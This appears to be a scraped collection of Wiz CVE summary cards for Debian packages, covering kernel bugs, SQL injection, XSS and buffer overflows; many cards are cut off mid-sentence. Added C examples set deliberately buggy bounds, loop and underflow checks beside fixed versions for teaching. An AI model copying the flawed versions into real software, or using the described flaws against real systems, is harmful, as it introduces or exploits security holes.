## CVE-2022-50877: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
net: broadcom: bcm4908_enet: update TX stats after actual transmission
Queueing packets doesn't guarantee their transmission. Update TX stats
after hardware confirms consuming submitted data.
This also fixes a possible race and NULL dereference.
bcm4908_enet_start_xmit() could try to access skb after freeing it in
the bcm4908_enet_poll_tx().
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.8
Exploitation Probability (EPSS) N/A
Affected packages a
Wiz: CVE-2026-33058 Impact, Exploitability, and Mitigation Steps (CVSS 8.4, HIGH)
## CVE-2026-33058: Linux Debian vulnerability analysis and mitigation
Kanboard is project management software focused on Kanban methodology. Versions prior to 1.2.51 have an authenticated SQL injection vulnerability. Attackers with the permission to add users to a project can leverage this vulnerability to dump the entirety of the kanboard database. Version 1.2.51 fixes the issue.
Source : NVD
Score 8.4
Published March 18, 2026
Severity HIGH
CNA Score 8.4
Affected Technologies
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
kanboard
Sources
NVD
Debian 14 Severity MEDIUM Has Fix Added at: Mar
Wiz: CVE-2026-23194 Impact, Exploitability, and Mitigation Steps (CVSS 7.8, HIGH)
## CVE-2026-23194: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
rust_binder: correctly handle FDA objects of length zero
skip == 0
I considered the alternate option of not pushing a fixup when the length
is zero, but I think it's cleaner to just get rid of the zero-is-special
stuff.
The root cause of this bug was diagnosed by Gemini CLI on first try. I
used the following prompt:
There appears to be a bug in @drivers/android/binder/thread.rs where
the Fixups oob bug is triggered with 316 304 316 324. This implies
that we somehow ended up with a fixup where buffer A has a pointer to
buffer B, but the pointer is located at an index in buffer A that is
out of bounds. Please investigate the code to find
Wiz: CVE-2026-23464 Impact, Exploitability, and Mitigation Steps (CVSS 5.3, MEDIUM)
## CVE-2026-23464: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
soc: microchip: mpfs: Fix memory leak in mpfs_sys_controller_probe()
In mpfs_sys_controller_probe(), if of_get_mtd_device_by_node() fails,
the function returns immediately without freeing the allocated memory
for sys_controller, leading to a memory leak.
Fix this by jumping to the out_free label to ensure the memory is
properly freed.
Also, consolidate the error handling for the mbox_request_channel()
failure case to use the same label.
Source : NVD
Published April 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitati
Wiz: CVE-2024-29370 Impact, Exploitability, and Mitigation Steps (CVSS 5.3, MEDIUM)
## CVE-2024-29370: Linux Debian vulnerability analysis and mitigation
In python-jose 3.3.0 (specifically jwe.decrypt), a vulnerability allows an attacker to cause a Denial-of-Service (DoS) condition by crafting a malicious JSON Web Encryption (JWE) token with an exceptionally high compression ratio. When this token is processed by the server, it results in significant memory allocation and processing time during decompression.
Source : NVD
Score 5.3
Published December 17, 2025
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 36.3
Exploitation Probability (EPSS) 0.2
Affected packages and libraries
python-jose
Wiz: CVE-2026-4645 Impact, Exploitability, and Mitigation Steps (CVSS 7.5, HIGH)
## CVE-2026-4645: Linux Debian vulnerability analysis and mitigation
Rejected reason: Duplicate of CVE-2026-32287
Source : NVD
Score 7.5
Published March 23, 2026
Severity HIGH
CNA Score N/A
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
golang-github-antchfx-xpath
opentelemetry-collector
Sources
NVD
Debian 11 Severity MEDIUM No Fix Added at: Mar 24, 2026
Debian 12, 13 Severity HIGH No Fix Added at: Mar 24, 2026
Debian 14 Severity HIGH Has Fix Added at: Mar 24, 2026
Echo Severity HIGH No Fix Added at: Mar 24, 2026
Red Hat 9, 10 Severity HIGH No Fix Ad
Wiz: CVE-2023-54103 Impact, Exploitability, and Mitigation Steps (CVSS 5.3, MEDIUM)
## CVE-2023-54103: Linux Debian vulnerability analysis and mitigation
Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.
Source : NVD
Published December 24, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-aws-fips
linux-azure-fips
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: Dec 26, 2025
Echo Has Fix Added at: Dec 26, 2025
Ubuntu 16.04, 18.04, 20.04 Severity MEDIUM No Fix Added at: Dec 26, 2025
Wiz: CVE-2023-54124 Impact, Exploitability, and Mitigation Steps
## CVE-2023-54124: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
f2fs: fix to drop all dirty pages during umount() if cp_error is set
xfstest generic/361 reports a bug as below:
f2fs_bug_on(sbi, sbi->fsync_node_num);
kernel BUG at fs/f2fs/super.c:1627!
RIP: 0010:f2fs_put_super+0x3a8/0x3b0
Call Trace:
generic_shutdown_super+0x8c/0x1b0
kill_block_super+0x2b/0x60
kill_f2fs_super+0x87/0x110
deactivate_locked_super+0x39/0x80
deactivate_super+0x46/0x50
cleanup_mnt+0x109/0x170
__cleanup_mnt+0x16/0x20
task_work_run+0x65/0xa0
exit_to_user_mode_prepare+0x175/0x190
syscall_exit_to_user_mode+0x25/0x50
do_syscall_64+0x4c/0x90
entry_SYSCALL_64_after_hwframe+0x72/0xdc
During umount(), if cp_error is set, f2fs_wait_on_all_pag
Wiz: CVE-2026-23409 Impact, Exploitability, and Mitigation Steps
## CVE-2026-23409: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
apparmor: fix differential encoding verification
Differential encoding allows loops to be created if it is abused. To
prevent this the unpack should verify that a diff-encode chain
terminates.
Unfortunately the differential encode verification had two bugs.
It conflated states that had gone through check and already been
marked with states that were currently being checked and marked.
This means that loops in the current chain being verified are treated
as a chain that has already been verified.
The order bailout on already checked states compared current chain
check iterators j,k instead of using the outer loop iterator i.
Meaning a step backwa
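The first bug named in the card above (one mark that conflates "already verified" with "currently being checked") is easy to reproduce on a small stand-in for a diff-encoded state table. The C below is an added example and is not AppArmor's or the kernel's code: the `base[]` array (state i falls back to state `base[i]`, -1 ends the chain), `MAX_STATES`, and the function names are assumptions made for illustration. It shows why a walk that cannot tell "seen earlier" from "seen in this very chain" accepts a loop, and the three-mark form that rejects it.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Assumed stand-in for a diff-encoded table: state i falls back to base[i];
 * base[i] == -1 means the chain ends there. Not the AppArmor data layout. */
#define MAX_STATES 32
enum mark { UNMARKED = 0, IN_PROGRESS = 1, VERIFIED = 2 };

/* Buggy shape from the commit text: a single "checked" flag serves both for
 * "verified earlier" and "marked during this walk", so a chain that loops back
 * into itself stops at a flagged state and is accepted as terminating. */
static bool chains_terminate_buggy(const int *base, size_t n)
{
    bool checked[MAX_STATES] = { false };

    if (n > MAX_STATES)
        return false;
    for (size_t i = 0; i < n; i++) {
        int s = (int)i;
        while (s >= 0) {
            if (s >= (int)n)
                return false;        /* base points outside the table */
            if (checked[s])
                break;               /* cannot tell: verified, or part of this loop? */
            checked[s] = true;
            s = base[s];
        }
    }
    return true;                     /* loops are never reported */
}

/* Fixed shape: three marks. Meeting an IN_PROGRESS state again is a loop in the
 * chain being walked; a VERIFIED state is a chain already proven to terminate. */
static bool chains_terminate(const int *base, size_t n)
{
    uint8_t mark[MAX_STATES] = { UNMARKED };

    if (n > MAX_STATES)
        return false;
    for (size_t i = 0; i < n; i++) {
        int s = (int)i;
        while (s >= 0) {
            if (s >= (int)n)
                return false;
            if (mark[s] == VERIFIED)
                break;
            if (mark[s] == IN_PROGRESS)
                return false;        /* chain loops back into itself */
            mark[s] = IN_PROGRESS;
            s = base[s];
        }
        /* Everything walked in this pass is now known to terminate. */
        for (int t = (int)i; t >= 0 && mark[t] == IN_PROGRESS; t = base[t])
            mark[t] = VERIFIED;
    }
    return true;
}

int main(void)
{
    const int ok[4]   = { -1, 0, 1, 1 };   /* constructed: every chain reaches -1 */
    const int loop[3] = { 1, 2, 0 };       /* constructed: 0 -> 1 -> 2 -> 0 */

    printf("ok:   buggy=%d fixed=%d\n", chains_terminate_buggy(ok, 4), chains_terminate(ok, 4));
    printf("loop: buggy=%d fixed=%d\n", chains_terminate_buggy(loop, 3), chains_terminate(loop, 3));
    return 0;
}
```

The table with the cycle is accepted by the single-flag walk and rejected by the three-mark walk; the bounds check on `base[]` is there because a loaded policy is untrusted input and an out-of-table base is as bad as a cycle.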
Wiz: CVE-2026-2704 Impact, Exploitability, and Mitigation Steps (CVSS 5.3, MEDIUM)
## CVE-2026-2704: Linux Debian vulnerability analysis and mitigation
A security vulnerability has been detected in Open Babel up to 3.1.1. The affected element is the function OpenBabel::transform3d::DescribeAsString of the file src/math/transform3d.cpp of the component CIF File Handler. The manipulation leads to out-of-bounds read. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The identifier of the patch is e23a224b8fd9d7c2a7cde9ef4ec6afb4c05aa08a. It is suggested to install a patch to address this issue. The project was informed of the problem early through an issue report but has not responded yet.
Source : NVD
Score 5.3
Published February 19, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Wiz: CVE-2025-14932 Impact, Exploitability, and Mitigation Steps (CVSS 7.8, HIGH)
## CVE-2025-14932: Linux Debian vulnerability analysis and mitigation
NSF Unidata NetCDF-C Time Unit Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of NSF Unidata NetCDF-C. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
The specific flaw exists within the parsing of time units. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27273.
Source : NVD
Score 7.8
Published December 23, 20
Wiz: CVE-2023-54180 Impact, Exploitability, and Mitigation Steps
## CVE-2023-54180: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
btrfs: handle case when repair happens with dev-replace
[BUG]
There is a bug report that a BUG_ON() in btrfs_repair_io_failure()
(originally repair_io_failure() in v6.0 kernel) got triggered when
replacing an unreliable disk:
BTRFS warning (device sda1): csum failed root 257 ino 2397453 off 39624704 csum 0xb0d18c75 expected csum 0x4dae9c5e mirror 3
kernel BUG at fs/btrfs/extent_io.c:2380!
invalid opcode: 0000 [#1] PREEMPT SMP NOPTI
CPU: 9 PID: 3614331 Comm: kworker/u257:2 Tainted: G OE 6.0.0-5-amd64 #1 Debian 6.0.10-2
Hardware name: Micro-Star International Co., Ltd. MS-7C60/TRX40 PRO WIFI (MS-7C60), BIOS 2.70 07/01/2021
Workqueue: btrfs-endio btrfs
Wiz: CVE-2023-54187 Impact, Exploitability, and Mitigation Steps (CVSS 5.3, MEDIUM)
## CVE-2023-54187: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
f2fs: fix potential corruption when moving a directory
F2FS has the same issue as in ext4_rename, causing a crash revealed by
xfstests/generic/707.
See also commit 0813299c586b ("ext4: Fix possible corruption when moving a directory")
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-riscv-6.8
linux-aws-5.4
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: Dec 31, 2025
Wiz: CVE-2025-68920 Impact, Exploitability, and Mitigation Steps (CVSS 8.9, HIGH)
## CVE-2025-68920: Linux Debian vulnerability analysis and mitigation
C-Kermit (aka ckermit) through 10.0 Beta.12 (aka 416-beta12) before 244644d allows a remote Kermit system to overwrite files on the local system, or retrieve arbitrary files from the local system.
Source : NVD
Score 8.9
Published December 24, 2025
Severity HIGH
CNA Score 8.9
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 18.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
ckermit
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Dec 26, 2025
Debian 14 Severity HIGH Has Fix Added at: Dec 26, 2025
Echo Severity HIGH No Fix Added at:
Wiz: CVE-2025-71124 Impact, Exploitability, and Mitigation Steps (CVSS 5.5, MEDIUM)
## CVE-2025-71124: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
drm/msm/a6xx: move preempt_prepare_postamble after error check
Move the call to preempt_prepare_postamble() after verifying that
preempt_postamble_ptr is valid. If preempt_postamble_ptr is NULL,
dereferencing it in preempt_prepare_postamble() would lead to a crash.
This change avoids calling the preparation function when the
postamble allocation has failed, preventing potential NULL pointer
dereference and ensuring proper error handling.
Patchwork: https://patchwork.freedesktop.org/patch/687659/
Source : NVD
Score 5.5
Published January 14, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public
Wiz: CVE-2026-0966 Impact, Exploitability, and Mitigation Steps (CVSS 6.5, MEDIUM)
## CVE-2026-0966: Linux Debian vulnerability analysis and mitigation
ssh_get_hexa()
ssh_get_fingerprint_hash()
ssh_print_hexa()
The function is also used internally in the gssapi code for logging
the OIDs received by the server during GSSAPI authentication. This
could be triggered remotely, when the server allows GSSAPI authentication
and logging verbosity is set at least to SSH_LOG_PACKET (3). This
could cause self-DoS of the per-connection daemon process.
Source : NVD
Score 6.5
Published March 26, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 28.2
Exploitation Probability (EPSS) 0.1
Affecte
Wiz: CVE-2025-68175 Impact, Exploitability, and Mitigation Steps
## CVE-2025-68175: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
media: nxp: imx8-isi: Fix streaming cleanup on release
The current implementation unconditionally calls
mxc_isi_video_cleanup_streaming() in mxc_isi_video_release(). This can
lead to situations where any release call (like from a simple
"v4l2-ctl -l") may release a currently streaming queue when called on
such a device.
This is reproducible on an i.MX8MP board by streaming from an ISI
capture device using gstreamer:
gst-launch-1.0 -v v4l2src device=/dev/videoX ! \
video/x-raw,format=GRAY8,width=1280,height=800,framerate=1/120 ! \
fakesink
While this stream is running, querying the caps of the same device
provokes the error state:
v4l2-ctl -l -d
Wiz: CVE-2026-27473 Impact, Exploitability, and Mitigation Steps (CVSS 5.1, MEDIUM)
## CVE-2026-27473: Linux Debian vulnerability analysis and mitigation
SPIP before 4.4.9 allows Stored Cross-Site Scripting (XSS) via syndicated sites in the private area. The #URL_SYNDIC output is not properly sanitized on the private syndicated site page, allowing an attacker who can set a malicious syndication URL to inject persistent scripts that execute when other administrators view the syndicated site details.
Source : NVD
Score 5.1
Published February 19, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
spip
Sources
NVD
Debi
Wiz: CVE-2025-68760 Impact, Exploitability, and Mitigation Steps (CVSS 5.3, MEDIUM)
## CVE-2025-68760: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
iommu/amd: Fix potential out-of-bounds read in iommu_mmio_show
iommu->dbg_mmio_offset > iommu->mmio_phys_end - 4
Fix this by adjusting the boundary check to use sizeof(u64), which
corresponds to the size of the readq() operation.
Source : NVD
Published January 5, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-aws
linux-aws-6.17
Sources
NVD
Debian 14 Has Fix Added at: Jan 05, 2026
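The fix text above says the guard was written for a 4-byte access while the read is a readq(), i.e. 8 bytes: an offset that passes `offset > end - 4` can still have its last four bytes outside the window. The C below is an added example, not the kernel's iommu code: the 64-byte window `MMIO_PHYS_END`, the function names and the generic `access_fits()` form (which takes the access width as a parameter so the guard cannot drift from the read size) are assumptions made for illustration.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Assumed MMIO window of 64 bytes, valid offsets [0, MMIO_PHYS_END). Not kernel data. */
#define MMIO_PHYS_END 64u

/* Pre-fix shape from the card: guard sized for a 4-byte read. */
static bool offset_ok_old(uint64_t off)
{
    return !(off > MMIO_PHYS_END - 4);
}

/* Post-fix shape: guard width equals the readq() width, sizeof(uint64_t). */
static bool offset_ok_fixed(uint64_t off)
{
    return !(off > MMIO_PHYS_END - sizeof(uint64_t));
}

/* General form: does an access of `width` bytes at `off` fit inside [0, end)?
 * Written as a subtraction on the right so `off + width` can never wrap. */
static bool access_fits(uint64_t off, size_t width, uint64_t end)
{
    return off <= end && width <= end - off;
}

/* How many bytes an 8-byte read at `off` would run past the window (0 = in bounds). */
static uint64_t overrun_bytes(uint64_t off)
{
    uint64_t last = off + sizeof(uint64_t);
    return last > MMIO_PHYS_END ? last - MMIO_PHYS_END : 0;
}

int main(void)
{
    uint64_t off = MMIO_PHYS_END - 4;    /* constructed: passes the old guard, overruns by 4 */

    printf("off=%llu old=%d fixed=%d overrun=%llu\n",
           (unsigned long long)off, offset_ok_old(off), offset_ok_fixed(off),
           (unsigned long long)overrun_bytes(off));
    return 0;
}
```

The pattern to look for in review is any bounds check whose constant is written by hand next to an access whose size comes from a type or a helper; tying the two together, as `access_fits()` does, removes the class of bug rather than this one instance.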
Wiz: CVE-2026-23015 Impact, Exploitability, and Mitigation Steps (CVSS 5.5, MEDIUM)
## CVE-2026-23015: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
gpio: mpsse: fix reference leak in gpio_mpsse_probe() error paths
The reference obtained by calling usb_get_dev() is not released in the
gpio_mpsse_probe() error paths. Fix that by using device managed helper
functions. Also remove the usb_put_dev() call in the disconnect function
since now it will be released automatically.
Source : NVD
Score 5.5
Published January 31, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.9
Exploitation Probability (EPSS) N/A
Affe
Wiz: CVE-2025-61982 Impact, Exploitability, and Mitigation Steps (CVSS 7.8, HIGH)
## CVE-2025-61982: Linux Debian vulnerability analysis and mitigation
An arbitrary code execution vulnerability exists in the Code Stream directive functionality of OpenCFD OpenFOAM 2506. A specially crafted OpenFOAM simulation file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.
Source : NVD
Score 7.8
Published February 18, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
openfoam
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Feb 19, 2026
Echo Severity
Wiz: CVE-2023-54257 Impact, Exploitability, and Mitigation Steps
## CVE-2023-54257: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
net: macb: fix a memory corruption in extended buffer descriptor mode
For quite some time we were chasing a bug which looked like a sudden
permanent failure of networking and mmc on some of our devices.
The bug was very sensitive to any software changes and even more to
any kernel debug options.
Finally we got a setup where the problem was reproducible with
CONFIG_DMA_API_DEBUG=y and it revealed the issue with the rx dma:
[ 16.992082] ------------[ cut here ]------------
[ 16.996779] DMA-API: macb ff0b0000.ethernet: device driver tries to free DMA memory it has not allocated [device address=0x0000000875e3e244] [size=1536 bytes]
[ 17.011049] WARNIN
Wiz: CVE-2018-25224 Impact, Exploitability, and Mitigation Steps (CVSS 8.6, HIGH)
## CVE-2018-25224: Linux Debian vulnerability analysis and mitigation
PMS 0.42 contains a stack-based buffer overflow vulnerability that allows local unauthenticated attackers to execute arbitrary code by supplying malicious values in the configuration file. Attackers can craft configuration files with oversized input that overflows the stack buffer and execute shell commands via return-oriented programming gadgets.
Source : NVD
Score 8.6
Published March 28, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
pms
Sources
NVD
Debian 11, 1
Wiz: CVE-2026-4424 Impact, Exploitability, and Mitigation Steps (CVSS 5.3, MEDIUM)
## CVE-2026-4424: Linux Debian vulnerability analysis and mitigation
A flaw was found in libarchive. This heap out-of-bounds read vulnerability exists in the RAR archive processing logic due to improper validation of the LZSS sliding window size after transitions between compression methods. A remote attacker can exploit this by providing a specially crafted RAR archive, leading to the disclosure of sensitive heap memory information without requiring authentication or user interaction.
Source : NVD
Score 7.5
Published March 19, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 38.7
Exploitation Probabi
Wiz: CVE-2025-68786 Impact, Exploitability, and Mitigation Steps (CVSS 5.3, MEDIUM)
## CVE-2025-68786: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ksmbd: skip lock-range check on equal size to avoid size==0 underflow
size - 1
Source : NVD
Published January 13, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-oracle-6.14
linux-fips
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: Jan 14, 2026
Echo Has Fix Added at: Jan 14, 2026
Ubuntu 16.04, 18.04, 20.04 Severity MEDIUM No Fix Added at: Jan 15, 2026
Ubuntu 22.04, 24.04, 25.10 Severity MEDIUM
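The commit title above points at `start + size - 1` style arithmetic: with unsigned integers and `size == 0` the subtraction wraps, and the resulting "end" no longer describes the range. The C below is an added illustration of that arithmetic, not ksmbd's lock code and not a statement of SMB2 lock semantics: `struct range`, the function names and the policy that an empty request is malformed are assumptions for the example. It shows the inclusive-end form turning a zero-length range at offset 0 into one that overlaps everything, and an exclusive-end form with no subtraction to underflow.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Assumed byte range covering [start, start + len). Not the ksmbd structure. */
struct range {
    uint64_t start;
    uint64_t len;
};

/* Inclusive-end overlap test with end = start + len - 1.
 * For len == 0 the subtraction wraps: a zero-length range at 0 gets end == UINT64_MAX
 * and "overlaps" every other range; at any other start it becomes an inverted range. */
static bool overlap_naive(struct range a, struct range b)
{
    uint64_t a_end = a.start + a.len - 1;
    uint64_t b_end = b.start + b.len - 1;

    return a.start <= b_end && b.start <= a_end;
}

/* A range is usable only if it is non-empty and start + len does not wrap. */
static bool range_valid(struct range r)
{
    return r.len != 0 && r.start <= UINT64_MAX - r.len;
}

/* Exclusive-end overlap test: no subtraction, so nothing can underflow.
 * Empty ranges overlap nothing (assumption for this example). Callers must have
 * validated both ranges with range_valid() so that start + len cannot wrap. */
static bool overlap_safe(struct range a, struct range b)
{
    if (a.len == 0 || b.len == 0)
        return false;
    uint64_t a_end = a.start + a.len;   /* exclusive end */
    uint64_t b_end = b.start + b.len;

    return a.start < b_end && b.start < a_end;
}

/* Lock-request check against one held lock (assumed already validated):
 * -1 malformed request, 1 conflicts with `held`, 0 free. */
static int lock_check(struct range held, struct range req)
{
    if (!range_valid(req))
        return -1;
    return overlap_safe(held, req) ? 1 : 0;
}

int main(void)
{
    struct range zero_at_0 = { 0, 0 };       /* constructed: the underflow trigger */
    struct range held      = { 100, 10 };    /* constructed: bytes 100..109 */

    printf("naive=%d safe=%d check=%d\n",
           overlap_naive(zero_at_0, held), overlap_safe(zero_at_0, held),
           lock_check(held, zero_at_0));
    return 0;
}
```

The naive form reports a conflict between an empty request and an unrelated lock; validating length and wrap once at the boundary, then comparing with exclusive ends, keeps the later arithmetic trivially safe.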
Wiz: CVE-2026-4185 Impact, Exploitability, and Mitigation Steps (CVSS 5.3, MEDIUM)
## CVE-2026-4185: Linux Debian vulnerability analysis and mitigation
A vulnerability was found in GPAC up to 2.5-DEV-rev2167-gcc9d617c0-master. This vulnerability affects the function swf_def_bits_jpeg of the file src/scene_manager/swf_parse.c of the component MP4Box. The manipulation of the argument szName results in stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been made public and could be used. The patch is identified as 8961c74f87ae3fe2d3352e622f7730ca96d50cf1. A patch should be applied to remediate this issue.
Source : NVD
Score 5.3
Published March 16, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Expl
Wiz: CVE-2022-50874 Impact, Exploitability, and Mitigation Steps (CVSS 5.3, MEDIUM)
## CVE-2022-50874: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
RDMA/erdma: Fix refcount leak in erdma_mmap
rdma_user_mmap_entry_get() takes a reference; we should release it when it is
no longer needed. Add the missing rdma_user_mmap_entry_put() in the error
path to fix it.
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-fips
linux-gcp-fips
Sources
NVD
Debian 12, 13, 14 Has Fix Added at: Dec 31, 2025
Echo Has Fix Added at: Dec 31, 2025
Wiz: CVE-2026-23358 Impact, Exploitability, and Mitigation Steps (CVSS 5.3, MEDIUM)
## CVE-2026-23358: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: Fix error handling in slot reset
If the device has not recovered after slot reset is called, it goes to
out label for error handling. There it could make decision based on
uninitialized hive pointer and could result in accessing an uninitialized
list.
Initialize the list and hive properly so that it handles the error
situation and also releases the reset domain lock which is acquired
during error_detected callback.
(cherry picked from commit bb71362182e59caa227e4192da5a612b09349696)
Source : NVD
Published March 25, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
Wiz: CVE-2026-23411 Impact, Exploitability, and Mitigation Steps (CVSS 7.8, HIGH)
## CVE-2026-23411: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
apparmor: fix race between freeing data and fs accessing it
AppArmor was putting the reference to i_private data on its end after
removing the original entry from the file system. However the inode
can and does live beyond that point and it is possible that some of
the fs call back functions will be invoked after the reference has
been put, which results in a race between freeing the data and
accessing it through the fs.
While the rawdata/loaddata is the most likely candidate to fail the
race, as it has the fewest references, if properly crafted it might be
possible to trigger a race for the other types stored in i_private.
Fix this by moving the
Wiz: CVE-2023-54061 Impact, Exploitability, and Mitigation Steps (CVSS 5.3, MEDIUM)
## CVE-2023-54061: Linux Debian vulnerability analysis and mitigation
Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.
Source : NVD
Score 5.5
Published December 24, 2025
Severity MEDIUM
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-azure-fips
linux-fips
Sources
NVD
Debian 12 No Fix Added at: Dec 26, 2025
Debian 13, 14 Has Fix Added at: Dec 26, 2025
Echo Has Fix Added at: Dec 26, 2025
Ubuntu 16.04, 18.04, 20.04 Severity MEDIUM No Fix Added at: Dec 26, 2025
Wiz: CVE-2026-23468 Impact, Exploitability, and Mitigation Steps (CVSS 6.9, MEDIUM)
## CVE-2026-23468: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: Limit BO list entry count to prevent resource exhaustion
Userspace can pass an arbitrary number of BO list entries via the
